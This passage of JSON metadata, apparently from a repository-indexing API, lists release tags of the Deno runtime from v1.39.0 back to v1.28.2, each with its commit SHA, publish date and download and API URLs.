https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url"